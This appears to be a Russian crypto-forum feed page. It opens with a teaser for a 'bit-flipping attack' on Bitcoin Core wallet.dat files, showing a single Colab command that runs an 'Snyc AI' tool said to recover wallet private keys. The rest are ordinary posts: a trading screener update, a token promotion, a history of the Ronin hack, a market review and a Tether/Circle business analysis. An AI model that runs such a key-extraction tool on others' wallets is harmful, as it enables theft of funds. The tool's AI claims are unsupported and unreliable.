Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запуск инструмента Snyc AI:

!./snyc

Запуск инструмента Snyc AI в Google Colab позволяет использовать алгоритмы глубокого сканирования и восстановления данных, таких как секретные и приватные ключи для различных криптокошельков, с помощью методов искусственного интеллекта. Такие технологии основаны на машинном обучении и нейронных сетях, что обеспечивает высокую точность и безопасность при криптоанализе критически важных данных.

Если будете запускать эти команды в Google Colab, важно помнить, что:

  • Префикс ! позволяет выполнять системные (shell) команды непосредственно из ячеек программирования. Это делает Colab мощной платформой для гибридного использования различных языков программирование и командной строки.

  • При работе с внешними архивами и утилитами полезно проверять права доступа и содержимое файлов для безопасности и совместимости.

  • Инструмент Snyc AI является специализированным программным обеспечением для анализа криптографических данных, использующим современные возможности ИИ и нейросетей для повышения эффективности и надежности.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

  • Опубликованы две части [№1] , [№2] исследования


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.


Crypto Tools

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/3uCsL_zxKPI

Video tutorial: https://dzen.ru/video/watch/68baca013761775f268041dc

Источник: https://cryptodeeptool.ru/bit-flipping-attack-on-wallet-dat


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Показать полностью 22 1
Криптовалюта Финансовая грамотность Биткоины YouTube Трейдинг Арбитраж криптовалюты Заработок в интернете Заработок Вклад Облигации Пассивный доход Дивиденды Ключевая ставка Валюта Инвестиции в акции Видео Telegram (ссылка) Яндекс Дзен (ссылка) YouTube (ссылка) Длиннопост
1
Mate.matik
Mate.matik
23 часа назад

Сервис Diverx переехал на новую базу. Это было потно⁠⁠

Всем привет. Эта неделя наверное была испытанием. Понесло меня в вычислительные дебри и на сервисе получилось 5 индикаторов, а как показала практика sqlite3 такое не любит и пришлось переезжать на postgres. Но это было пол беды, потому что надо было каким-то образом сделать миграцию данных а работы с базами не мое от слова совсем.

Вооружившись блоком сигарет и несколькими кг кофе несколько дней колдовал над безболезненным переездом, но не все прошло гладко. Чтобы все пересчитать с моими мощностями мне бы понадобилось несколько дней, а мне очень этого не хотелось. Поэтому было решено начинать собирать историю заново.

Сервис Diverx переехал на новую базу. Это было потно Заработок, Криптовалюта, Биткоины, Трейдинг, Блог, Forex, Арбитражный суд, Длиннопост

Но зато есть свои плюсы. Грузиться все стало в разы быстрее. Выбор актива летает. Пока это реализовано для скальпинга, но в планах сделать мультитаймфрейм и сейчас по zscore я собираю агрегацию данных по всем тф. И после тестов будет видно на сколько это хорошая идея.

Сервис Diverx переехал на новую базу. Это было потно Заработок, Криптовалюта, Биткоины, Трейдинг, Блог, Forex, Арбитражный суд, Длиннопост

Добавился новый индикатор Hurst, пока не совсем нравится его подсчет, буду еще тестировать, поэтому в анализе его не использую. А все остальное работает как часы. С телефона удобно смотреть и понимать в каком состоянии рынок, если начинается активность - сразу это видно. А далее есть время чтобы посчитать куда ставить лимитки.

ДА! Я пока не на вебсокетах поэтому обновление данных происходит раз в минуту, но это не должно мешать потому что момент входа гораздо позже сигналов. Здесь вы успеваете увидеть зарождение активности по всему рынку.

В Телеграм канале показывал куда захожу,

Сервис Diverx переехал на новую базу. Это было потно Заработок, Криптовалюта, Биткоины, Трейдинг, Блог, Forex, Арбитражный суд, Длиннопост

Показывал как работаю со скринером

Сервис Diverx переехал на новую базу. Это было потно Заработок, Криптовалюта, Биткоины, Трейдинг, Блог, Forex, Арбитражный суд, Длиннопост

И вообще в целом у нас начинается там общение, поэтому кому интересно это направление - заходите присоединяйтесь. Сервис бесплатный, Телеграм ботов выложу на следующей неделе. А пока уходим на выходные.

p/.s.по форексу начинается раздвижка на 5 и 15 минутах, в начале следующей недели можно поарбитражить.

Сервис Diverx переехал на новую базу. Это было потно Заработок, Криптовалюта, Биткоины, Трейдинг, Блог, Forex, Арбитражный суд, Длиннопост
Показать полностью 5
[моё] Заработок Криптовалюта Биткоины Трейдинг Блог Forex Арбитражный суд Длиннопост
0
bestofplanetx
bestofplanetx
1 день назад

Autonomys AI3 - Вчера это был твой HDD, сегодня — участник Web3⁠⁠

Autonomys AI3 - Вчера это был твой HDD, сегодня — участник Web3 Криптовалюта, Биткоины, Технологии, Заработок, Заработок в интернете, Искусственный интеллект, Арбитраж криптовалюты, Децентрализация, Трейдинг, Информационная безопасность, Майнинг, Пассивный доход, Ферма майнинга, Длиннопост

Мой HDD стал инвестором: как Autonomys AI3 дал шанс каждому майнить и почему в проект поверили крупные фонды

Ребята, представьте картину: вы приносите на свалку старый жёсткий диск, а через пару месяцев он уже «чувствует себя инвестором» — приносит токены и гордо сидит в портфеле. Звучит как анекдот? Нет — это реальность в мире Autonomys (AI3). Я расскажу простым языком, почему проект запал в душу не только мелким фермерам, но и большим венчурным фондам.

Коротко для тех, кто в танке

Что за зверь такой, этот Autonomys? 🐉

Это блокчейн, придуманный бывшими инженерами из NASA, Google и Intel. Они решили: «А чё это все данные хранят в Амазонах и Майкрософтах? Давайте сделаем распределённую сеть, где всё децентрализовано, а хранить будут обычные люди».

Так появился их консенсус Proof-of-Archival-Storage (PoAS) — майнинг, где ты не сжигаешь электричество на асиках, а просто выделяешь свободное место на диске.

Autonomys — это блокчейн с консенсусом Proof-of-Archival-Storage (PoAS): вместо вычислений или стейка ты выделяешь место на диске. За хранение и участие в подтверждении блоков платят токенами $AI3. Проект прошёл тестнеты, ребрендился из Subspace в Autonomys, и в августе 2025 вышел в mainnet с первым листингом на крупных биржах.

А где фонды? — прямо в зале, аплодируют

И вот что важно: проект поддержали реально серьёзные игроки рынка. Среди них:

  • Coinbase Ventures

  • Digital Currency Group (DCG)

  • Pantera Capital

  • Galaxy Digital

  • Hypersphere Ventures

Это не «Вася с парой битков» — это инвестиционные бюро, которые обычно вносят не только деньги, но и проверяют команду, код, перспективы. Когда такие фонды ставят на проект — это сигнал рынку: технология и команда прошли серьёзную фильтрацию.

Почему фонды заходят?

  • Технологическая идея (дешёвое, масштабируемое хранение) выглядит практичной.

  • Рынок децентрализованного хранения и AI-инфраструктуры растёт — потенциал масштабирования большой.

  • Модель эмиссии и планы команды дают долгосрочные стимулы для роста сети.

И да, это не значит «гарантия богатства», но это серьёзный плюс в карму проекта.

Как это работает — кратко и по-человечески

  1. Скачиваешь десктоп-клиент (например, Space Acres).

  2. Подключаешь HDD/SSD и выделяешь пространство (от сотен гигабайт до терабайтов).

  3. Клиент заполняет диск шифрованными «участками».

  4. Сеть случайным образом выбирает участки для подтверждения блоков — если ваш участок выбран и проходит проверку — получаете $AI3.

Главное преимущество: энергоэффективно. Не надо гнать ферм с сотнями видеокарт и бояться счёта за электричество.

Немного цифр и дат (важно для контекста)

  • Тестнеты и бета-фазы шли в 2022–2024 годах.

  • Ребрендинг Subspace → Autonomys объявлен в 2024 году.

  • Mainnet и публичный выпуск токена $AI3 — август 2025.

  • Первые заметные листинги — около 29 августа 2025 (ряд крупных бирж).

Токеномика простым языком

  • Max supply: 1,000,000,000 AI3.

  • Выпуск растянут на десятилетия (чтобы не быть жертвой одномоментных «сливов»).

  • Значительная доля эмиссии предназначена фермерам/хранителям — то есть те, кто фактически дает сеть ресурсами, награждаются.

  • Части для команды и инвесторов разлочены по графику — это обычная практика; важно понимать эти графики, чтобы оценить риски давления на цену при разлочках.

Зачем это интересно простым людям?

  • У тебя в чулане пылится 2–4 ТБ? Подключил — и уже потенциальный фармер.

  • Нет километров проводов, нет горы вентиляции, не нужно профигаться с электричеством.

  • Проект привлек фонды — значит вероятность, что он умрёт в ближайшие пару недель, меньше, чем у очередного «мем-коина».

Где тут подвох (честно)

  • Никаких «гарантированных иксов» нет. Рынок волатилен.

  • Unlock-графики токенов и разлочки — потенциальный источник давления на цену.

  • Нужно следить за апдейтами клиента и за безопасностью ключей (используйте non-custodial кошельки и, если хотите максимум защиты — аппаратные кошельки).

Финальный аккорд (и вопрос в эфир)

Autonomys — проект с технологией, которая даёт шанс многим людям участвовать в инфраструктуре Web3 и AI. И да, когда твой старый HDD вдруг начинает приносить крипту, это похоже на чудо — но на чудо, подкреплённое инвестициями серьёзных фондов и технологической концепцией.

А теперь честно: кто из вас готов достать из шкафа старый диск и проверить, кто круче — он или ваш сосед? 😄

Показать полностью
Криптовалюта Биткоины Технологии Заработок Заработок в интернете Искусственный интеллект Арбитраж криптовалюты Децентрализация Трейдинг Информационная безопасность Майнинг Пассивный доход Ферма майнинга Длиннопост
3
10
gamedevdead
gamedevdead
1 день назад
Лига Криптовалют
Серия ТОП-5 Взломов в Крипте

5. Ronin Network (2022) – когда игра стоит $615 миллионов, а хакеры финансируют ракеты⁠⁠

5. Ronin Network (2022) – когда игра стоит $615 миллионов, а хакеры финансируют ракеты Научпоп, Криптовалюта, Биткоины, Взлом, Хакеры, Блокчейн, Длиннопост

Мир, в котором миллионы людей зарабатывают на жизнь выращиванием цифровых питомцев, ещё недавно казался утопией.

На Филиппинах студенты покупали еду за счёт виртуальных сражений. В Венесуэле таксисты меняли профессию на разведение аксолотлей в блокчейне. Экономика Axie Infinity стала явлением – игрой, которая превратилась в работу для 2,8 миллионов человек по всему миру.

А потом эта экономика исчезла в один миг. Не из-за падения курса, не из-за медленного кризиса, а словно кто-то выдернул кабель из розетки. На другом конце света хакеры с государственными паспортами решили пополнить казну своего режима и заодно профинансировать ракеты.

23 марта 2022 года группа Lazarus – элитное подразделение северокорейских киберспецслужб – взломала мост Ronin Network, по которому текли средства между Ethereum и игрой. Из системы исчезло 173 600 ETH и 25,5 млн USDC – в сумме $615 миллионов. Самое поразительное: кражу не замечали почти неделю.

Как рухнула артерия игры

Ronin был создан студией Sky Mavis как сайдчейн для Ethereum – лёгкая магистраль, где транзакции проходили быстрее и дешевле, чем в основной сети. Его сердце – мост, соединявший блокчейны и позволявший игрокам вносить и выводить токены.

Система держалась на девяти валидаторах. Чтобы провести перевод, требовалось пять подписей. На бумаге это казалось достаточной защитой. Но в реальности оказалось ахиллесовой пятой: злоумышленники получили контроль именно над пятью ключами. Два – принадлежали самой Sky Mavis, ещё один – сообществу Axie DAO, и этого хватило, чтобы санкционировать любые операции.

Сначала никто ничего не заметил. Но уже 23 марта хакеры «выписали себе чек» на сотни миллионов долларов. Шесть дней сеть продолжала работать в штатном режиме, пока обычный пользователь не попытался вывести 5 000 ETH и получил отказ.

Проверка показала: резерв пуст.

Команда на краю

Для Sky Mavis это стало днём, разделившим жизнь компании на «до» и «после». Перед командой стоял экзистенциальный выбор. Можно было признать крах – сумма в $615 миллионов многократно превышала резервы студии. Можно было отмахнуться от проблемы, списав её на техническую аварию. Но основатель Тран Тхань Трунг выбрал третий путь – спасать экосистему любой ценой.

В апреле компания привлекла $150 миллионов инвестиций, главным донором выступила Binance. В финансировании участвовали Animoca Brands, a16z, Paradigm и другие фонды. Эти деньги плюс собственные средства позволили компенсировать убытки пользователям.

Одновременно мост был пересобран: количество валидаторов увеличили до 13, а для подтверждения теперь требовалось 8 подписей. Добавили независимых операторов, круглосуточный мониторинг и аудит. Ошибка, стоившая полмиллиарда долларов, стала горьким, но бесценным уроком: жертвовать децентрализацией ради удобства смертельно опасно.

Хакеры – ракеты вместо аксолотлей

Почти сразу следствие вывело на Lazarus Group. Эти северокорейские хакеры известны давно: атака на Sony Pictures, кража $81 млн из Центробанка Бангладеш, нападения на биржи в Южной Корее и Японии. Их цель всегда одна – пополнение бюджета государства, изолированного санкциями.

Ronin стал продолжением этой линии.

Для КНДР это был не просто грабёж, а часть программы выживания: украденные криптовалюты должны были конвертироваться в валюту для финансирования ядерных и ракетных разработок.

Метод атаки был изящен и подл: через фишинговые письма с поддельными вакансиями разработчиков. Lazarus изучали резюме сотрудников Sky Mavis, создавали фальшивые предложения о работе, присылали документы с вредоносным кодом.

Один щелчок – и доступ к валидаторам оказался у них в руках.

Отмыть труднее, чем украсть

Но украсть деньги оказалось проще, чем ими распорядиться.

Lazarus пыталась раздробить активы и вывести их через децентрализованные биржи и сервисы анонимизации. Уже в конце марта они продали первую партию в 6 500 ETH. Но аналитики отслеживали каждый шаг.

К середине апреля на кошельках группы оставались сотни миллионов, и США внесли адреса в санкционный список OFAC. Средства превратились в «ядовитые» – их невозможно было обменять без риска блокировки. В августе 2022-го власти США пошли ещё дальше и ввели санкции против Tornado Cash, миксера, через который проходила часть похищенных активов.

Тем не менее Lazarus удалось вывести часть денег – через цепочку подпольных обменников, обналичив часть в азиатских странах. Сколько именно средств дошло до северокорейской военной программы, осталось тайной. Но уже сам факт: виртуальные питомцы из игры профинансировали ракеты, угрожающие Японии и Южной Корее.

Игроки: работа, исчезнувшая за ночь

Для миллионов игроков эта история стала личной трагедией.

В Юго-Восточной Азии Axie Infinity была не просто развлечением – это был источник дохода $300-600 в месяц, часто превышавший зарплату на реальной работе. Люди брали кредиты под покупку игровых питомцев, создавали «гильдии» арендаторов, кормили семьи токенами AXS и SLP.

И вдруг – обрыв.

Активы оказались заморожены, токены зависли в мосту, курсы рухнули. Студенты не могли оплатить учёбу, семьи в Венесуэле лишались единственного источника дохода. Игра, которая была спасением в кризис, сама стала кризисом.

Объявление Sky Mavis о компенсациях вернуло надежду, но доверие было подорвано. Когда мост заработал вновь, многие игроки вывели средства при первой возможности. Экономика Axie уже не смогла восстановиться – её монопольная эпоха в «play-to-earn» закончилась.

Геополитика криптовалют

Ronin показал, что криптовзломы перестали быть делом одиночек.
Впервые в истории целое государство использовало кражу цифровых активов для финансирования военной программы. Это изменило восприятие индустрии навсегда.

В мире децентрализованных финансов нет границ, но государственные интересы остаются. Северокорейские хакеры атаковали вьетнамскую игру, чтобы профинансировать оружие против Южной Кореи и Японии. То, что начиналось как кризис в гейминге, стало вопросом национальной безопасности.

Sky Mavis сумела пройти через катастрофу: возместила ущерб, усилила инфраструктуру, сохранила компанию. Но урок оказался суровее любых прошлых историй. Bitfinex доказал, что кризис можно превратить в доверие. Poly Network показал, что иногда хакер может оказаться философом. Ronin напомнил: за атакой может стоять государство, и тогда ставка выходит за пределы рынка – это уже вопрос мировой политики.

Ronin Network Moment

Ronin Network войдёт в историю как момент, когда из-за уязвимости в коде рухнула целая цифровая экономика, а миллионы людей лишились источника дохода. Но парадокс в том, что этот удар стал не только катастрофой, но и уроком.

Он показал, что децентрализация – это не абстрактный принцип, а реальная страховка от катастрофы. Что любой «мост» в блокчейне – это артерия, и её разрыв смертельно опасен. Что в мире криптовалют на кону стоят не только графики и токены, но и судьбы людей.

И, главное, Ronin напомнил: защищённость цифровых экосистем – это не техническая мелочь, а вопрос выживания. Игры, протоколы и целые экономики могут исчезнуть за одну ночь, если забыть об этом.


Вот и подошел к концу наш небольшой лонгрид о криптовзломах, которые изменили индустрию.

За пять историй мы проследили эволюцию цифрового криминала – от хаотичного падения Mt. Gox до высокотехнологичных атак государственных хакеров.

Надеюсь, каждый читатель нашел здесь что-то новое для себя. Я, погружаясь в эти истории, точно переосмыслил многие вещи и сделал очевидные выводы.

Парадокс в том, что эти катастрофы не убили криптовалюты – они их закалили. Принцип «не ваши ключи = не ваши монеты» из программистского жаргона превратился в народную мудрость. Аудиты из формальности стали жизненной необходимостью. Децентрализация из философского принципа – в практическое требование выживания.

Индустрия взрослела через боль. Каждый взлом становился прививкой для экосистемы. Сегодняшние протоколы безопаснее не потому, что технологии стали совершенными, а потому, что мы научились на чужих ошибках.

Давайте и мы будем учиться на чужих ошибках, чтобы совершать уже свои. В конце концов, прогресс всегда строился на том, что кто-то рискнул первым – и заплатил за это :)

Вернуться в начало серии постов


Спасибо за ваше внимание и время, потраченное на прочтение.

Автор: Arthur Yan

Показать полностью
[моё] Научпоп Криптовалюта Биткоины Взлом Хакеры Блокчейн Длиннопост
2
0
user10993667
user10993667
1 день назад

Обзор рынка 1–5 сентября: биткойн, эфир и рост DeFi⁠⁠

Bitcoin начал сентябрь 2025 года с осторожностью, торгуясь в диапазоне от 108 000 до 112 000 долларов на фоне исторически слабого периода «красного сентября». Постоянные оттоки из спотовых ETF, листингованных в США, усилили давление на продажи, и аналитики предупреждают о повышенных рисках более глубокого отката. Технические индикаторы продолжают указывать на преобладание медвежьего импульса, а уровень 100 000 долларов выступает ключевой поддержкой. Хотя прошлые циклы нередко показывали сентябрь как локальное дно, текущие настроения и перераспределение капитала сигнализируют о более волатильном и неопределённом сценарии, хотя некоторые прогнозисты по-прежнему ожидают сезонного отскока в IV квартале.

Ethereum продемонстрировал смешанную динамику, начав месяц чуть ниже 4 300 долларов и протестировав сопротивление в районе 4 550 долларов. Краткосрочные прогнозы определяют диапазон в 4 400–4 500 долларов, с возможным ростом к 5 000 долларов, если сопротивление будет уверенно преодолено. Однако трейдеры остаются разделёнными: ончейн-метрики, такие как объёмы DeFi, институциональные притоки и рост стейкинга, одновременно показывают бычьи сигналы накопления и настораживающие индикаторы макроэкономической неопределённости. Если ETH не сумеет пробить сопротивление, то консолидация или коррекция в район 3 500 долларов остаются вполне вероятными в краткосрочной перспективе.

В отличие от осторожного тона мейджоров, DeFi и стейблкоины выделяются заметной силой. Общая стоимость активов в децентрализованном кредитовании превысила 127 миллиардов долларов в этом году, чему в основном способствовал институциональный спрос на стейблкоины, а также интеграция реальных активов (RWA), таких как токенизированные частные кредиты и казначейские облигации США, в DeFi-платформы. Протоколы стали драйвером роста, а новые институциональные рынки предложили свежие механизмы использования RWA в качестве залога. Двузначная доходность по стейблкоинам также стала ключевым фактором притока инвесторов, привлекая пассивных участников и укрепляя мост между традиционными финансами и блокчейн-продуктами.

Тем временем отдельные альткоины сумели превзойти рынок, несмотря на сдержанную динамику мейджоров. Сектор DeFi прибавил 2,7% за неделю, а токены показали опережающие результаты. Проекты экосистем, включая Solana, Avalanche, Chainlink и Polygon, также усилили свои позиции благодаря техническим апгрейдам и стратегическим партнёрствам, что стимулировало активность в их сетях. Такая динамика подчеркивает, что в текущих условиях сильные нарративы и реальное использование сетей продолжают формировать локальные всплески роста, даже если топ-активы вроде Bitcoin и Ethereum остаются зажатыми сезонными факторами и неопределёнными настроениями.

*Дисклеймер: прежде чем инвестировать, проведите собственное исследование. BingX не несет ответственности за содержание, точность или убытки, связанные с любыми действиями, основанными на этой информации.

Показать полностью
Аналитика Биткоины Трейдинг Криптовалюта Инвестиции Текст
0
coredo
1 день назад
Серия Криптовалюты

Как на самом деле зарабатывают Tether и Circle. Невидимая печатная машинка на 13 миллиардов долларов⁠⁠

13 миллиардов долларов чистой прибыли за год, именно такую сумму, по самым скромным оценкам, генерирует Tether, крупнейший эмитент стейблкоинов, в 2024–2025 годах. Для сравнения: доходы многих традиционных банков и управляющих компаний с сопоставимым объемом активов существенно ниже. Как получилось, что Tether и Circle, эмитенты USDT и USDC, превратились в невидимую «печатную машинку» для криптоэкономики, а их бизнес-модели стали предметом пристального интереса не только предпринимателей, но и регуляторов по всему миру?

Сегодня стейблкоины - это не просто инструмент для быстрых международных транзакций или хеджирования волатильности. Их рыночная капитализация превышает $200 млрд, а ликвидность USDT и USDC стала стандартом для институциональных клиентов, венчурных фондов и финтех-компаний на всех континентах. При этом за внешней простотой - один токен равен одному доллару - скрывается сложная система обеспечения, управления резервами, взаимодействия с банками и стратегических партнерств.

Почему прибыль Tether превышает доходы Circle, несмотря на меньшую прозрачность? Как распределяются процентные доходы между эмитентом и институциональными партнерами? Какие риски несет модель Tether для корпоративных клиентов, и как регулирование в ЕС и Азии меняет правила игры для всего рынка?

В этой статье я, Никита Веремеев, основатель COREDO, предлагаю разобрать бизнес-модели Tether и Circle, показать их реальные источники дохода, раскрыть нюансы регулирования и дать практические рекомендации для компаний, которые уже используют или только планируют интеграцию стейблкоинов в свои процессы. Если вы хотите не просто понять, как работает этот рынок, а получить стратегические идеи для развития бизнеса - читайте до конца.

Прибыль стейблкоинов Tether и Circle

Как на самом деле зарабатывают Tether и Circle. Невидимая печатная машинка на 13 миллиардов долларов Развитие, Статья, Биткоины, Длиннопост


Прибыль стейблкоинов Tether и Circle во многом формируется за счет особенностей их работы с резервами и инвестициями. Чтобы понять, как именно эмитенты обеспечивают стабильность токенов и получают доход, важно рассмотреть их подходы к эмиссии и резервам.

Эмиссия и резервы стейблкоинов

Базовая логика эмиссии стейблкоинов: простая: каждый новый USDT или USDC выпускается под обеспечение в фиатной валюте (обычно доллар США) или эквивалентных ликвидных активах. Клиент, будь то биржа, OTC-деск или институциональный инвестор, отправляет доллары на банковский счет эмитента, получая взамен токены. При обратной операции - выкупе - эмитент сжигает токены и возвращает фиат.

А вот на практике обеспечение стейблкоинов: это не просто фиатные депозиты. Резервы Tether и Circle включают казначейские облигации США, депозиты в банках, коммерческие бумаги, а в случае Tether, также ряд менее прозрачных инструментов. Управление резервами становится отдельным источником дохода: средства, лежащие на счетах, работают на эмитента, принося процентный доход.

Наш опыт в COREDO показал, что для крупных корпоративных клиентов ключевым вопросом становится не только ликвидность стейблкоинов, но и прозрачность механизмов выкупа токенов, а также качество резервных активов. В кризисных ситуациях, например, при массовом выводе средств: именно структура резервов и способность быстро конвертировать их в фиат определяют устойчивость эмитента.

Доходы от процентов и инвестиций

Главный источник прибыли стейблкоинов: процентный доход от инвестирования резервов. В условиях высоких ставок ФРС в 2023–2025 годах доходность по краткосрочным казначейским облигациям США превышала 5% годовых. При объеме резервов в сотни миллиардов долларов даже небольшая разница между процентной ставкой по активам и обязательствами эмитента дает миллиардные прибыли.

Решение, разработанное в COREDO для анализа финансовых потоков эмитентов, позволяет выделить несколько ключевых элементов:

  • Tether инвестирует значительную часть резервов в трежерис и другие ликвидные инструменты, получая процентный доход, который практически полностью остается у эмитента. По оценкам COREDO, в 2024 году доходы Tether превысили $13 млрд за счет роста процентных ставок и увеличения объема эмиссии USDT.

  • Circle, напротив, делит до 50% процентного дохода с институциональными партнерами, прежде всего с Coinbase. Это снижает чистую прибыль эмитента, но обеспечивает устойчивую институциональную инфраструктуру и высокий уровень доверия со стороны корпоративных клиентов.

  • Помимо процентных доходов, существуют скрытые источники прибыли: комиссии за эмиссию и выкуп токенов, инвестиции в высокодоходные инструменты, доходы от операций с криптовалютными резервами и партнерские программы с биржами.

Практика COREDO подтверждает: для компаний, работающих с крупными объемами стейблкоинов, важно учитывать не только номинальную доходность резервов, но и риски, связанные со структурой активов и стратегиями управления ликвидностью.

Распределение доходов между партнерами и эмитентами

Стратегия распределения прибыли - ключевое отличие между Tether и Circle. В модели Tether практически весь процентный доход остается у эмитента, что обеспечивает максимальную прибыльность, но создает конфликты интересов с институциональными клиентами и партнерами. В случае Circle до 50% дохода от резервов USDC распределяется между эмитентом и партнерами, прежде всего Coinbase, что снижает маржу, но повышает устойчивость экосистемы.

Команда COREDO реализовала проекты для клиентов, которым критически важно понимать, как распределяются доходы между эмитентом и их банком-партнером или биржей. В ряде юрисдикций, особенно в ЕС и Азии, прозрачность распределения доходов становится требованием регуляторов и фактором выбора эмитента для корпоративных клиентов.

Сравнение отчетности Tether и Circle

Как на самом деле зарабатывают Tether и Circle. Невидимая печатная машинка на 13 миллиардов долларов Развитие, Статья, Биткоины, Длиннопост

Сравнение отчетности Tether и Circle позволяет понять, как крупнейшие эмитенты стейблкоинов обеспечивают доверие пользователей к своим токенам через регулярное раскрытие финансовых данных. Отличия в уровне прозрачности и роли аудитора играют ключевую роль в восприятии надежности каждого проекта, что особенно актуально на фоне растущего внимания к резервам и механизмам контроля в секторе стейблкоинов.

Раскрытие резервов: роль аудитора

Вопрос прозрачности резервов: один из самых острых для рынка стейблкоинов. Circle публикует ежемесячные отчеты о резервах, а аудит Deloitte и Touche, признанного аудитора из Big Four, обеспечивает дополнительный уровень доверия. Резервы USDC хранятся преимущественно в казначейских облигациях США и на счетах Bank of New York Mellon, что соответствует институциональным стандартам отчетности.

Tether, напротив, ограничивается периодическими отчетами и не проводит регулярный независимый аудит по стандартам Big Four. Это создает риски для институциональных клиентов и усложняет оценку реального качества резервов.

Опыт COREDO в сопровождении лицензирования и комплаенса для клиентов в ЕС и Азии показывает: для выхода на новые рынки и работы с крупными институциональными партнерами необходима не только финансовая прозрачность, но и соответствие международным стандартам аудита и сертификации резервов.

Прозрачность или прибыльность: что выбрать?

Модель Tether демонстрирует: минимальная прозрачность позволяет сохранять максимальную прибыльность, но увеличивает долгосрочные риски для эмитента и клиентов. Circle, напротив, жертвует частью дохода ради прозрачности и устойчивости.

В корпоративной практике COREDO мы сталкивались с кейсами, когда клиенты выбирали менее прибыльный, но более прозрачный стейблкоин для интеграции в свои бизнес-процессы, особенно в условиях ужесточения регулирования и требований к аудиту резервов. Долгосрочная устойчивость бизнеса напрямую зависит от баланса между прозрачностью и прибыльностью, а также от способности эмитента адаптироваться к новым требованиям рынка.

Регулирование стейблкоинов в ЕС, Азии и Африке

Как на самом деле зарабатывают Tether и Circle. Невидимая печатная машинка на 13 миллиардов долларов Развитие, Статья, Биткоины, Длиннопост


Регулирование стейблкоинов в ЕС, Азии и Африке заметно меняет глобальный рынок криптоактивов. Введение единых стандартов, таких как MiCA в Европе, требует от эмитентов новых подходов к прозрачности и управлению рисками, а страны Азии и Африки постепенно формируют собственные правила, чтобы не отставать от мировых трендов. Это создает новые вызовы и возможности для прибыльности и развития стейблкоинов в каждом регионе.

Влияние MiCA на прибыль стейблкоинов

Введение MiCA (Markets in Crypto-Assets Regulation) в ЕС стало поворотной точкой для рынка стейблкоинов. Новый регламент требует не только полного раскрытия структуры резервов, но и регулярного независимого аудита, внедрения процедур KYC/AML и ограничений на эмиссию для неквалифицированных инвесторов.

Решения COREDO для клиентов в ЕС и Словакии показали: внедрение MiCA приводит к росту издержек на комплаенс и снижению маржи эмитентов, но одновременно повышает доверие со стороны институциональных клиентов. Для Tether это означает необходимость перестроить бизнес-модель, снизить долю непрозрачных активов и увеличить расходы на аудит и раскрытие информации. Для Circle новые требования становятся конкурентным преимуществом, позволяя расширять присутствие на европейском рынке.

AML/KYC для бизнеса

Современные KYC/AML-процедуры и финансовый комплаенс - неотъемлемая часть корпоративной инфраструктуры при работе со стейблкоинами. Несоблюдение этих требований ведет к рискам блокировки счетов, штрафам и потере доступа к ключевым рынкам.

Практика COREDO в Азии и ЕС подтверждает: для успешной интеграции USDT и USDC в корпоративные процессы необходимо выстраивать внутренние комплаенс-процедуры, автоматизировать мониторинг транзакций и регулярно проводить аудит соответствия требованиям регуляторов. Это позволяет минимизировать риски несоответствия и повысить эффективность работы с институциональными партнерами.

Регулирование в Азии и Африке

В Азии регулирование стейблкоинов варьируется от строгих требований к лицензированию (Сингапур, Гонконг) до более гибких режимов (ОАЭ, некоторые страны Юго-Восточной Азии). В Африке наблюдается рост институционального спроса на прозрачные стейблкоины для трансграничных платежей и защиты от инфляции.

Команда COREDO реализовала проекты по регистрации компаний и получению финансовых лицензий в Сингапуре, Дубае и Эстонии, где ключевым фактором успеха стало соблюдение местных требований к раскрытию информации и стратегические партнерства с банками и платежными провайдерами. Для масштабирования бизнеса в этих регионах критически важно учитывать специфику регулирования и выстраивать институциональную инфраструктуру, соответствующую международным стандартам.

Риски для эмитентов и корпоративных клиентов

Как на самом деле зарабатывают Tether и Circle. Невидимая печатная машинка на 13 миллиардов долларов Развитие, Статья, Биткоины, Длиннопост

Риски для эмитентов и корпоративных клиентов приобретают особое значение в условиях быстро меняющегося криптовалютного рынка и ограниченного регулирования. Помимо высокой волатильности и технических сложностей, компаниям важно заранее оценивать потенциальные угрозы, связанные с ликвидностью, выкупом токенов и надежностью резервов, чтобы минимизировать возможные потери и защитить интересы клиентов.

Ликвидность и выкуп токенов: проверка резервов

Ликвидность стейблкоинов и способность эмитента обеспечить быстрый выкуп токенов: ключевые параметры для корпоративных клиентов. В периоды рыночной турбулентности именно качество резервных активов и наличие стресс-тестирования определяют устойчивость эмитента.

Решение COREDO для оценки ликвидности USDT и USDC включает анализ структуры резервов, диверсификации активов и сценариев стресс-тестирования. Для компаний, работающих с крупными объемами, важно регулярно проводить независимую проверку резервов и оценивать риски ликвидности на случай массового вывода средств.

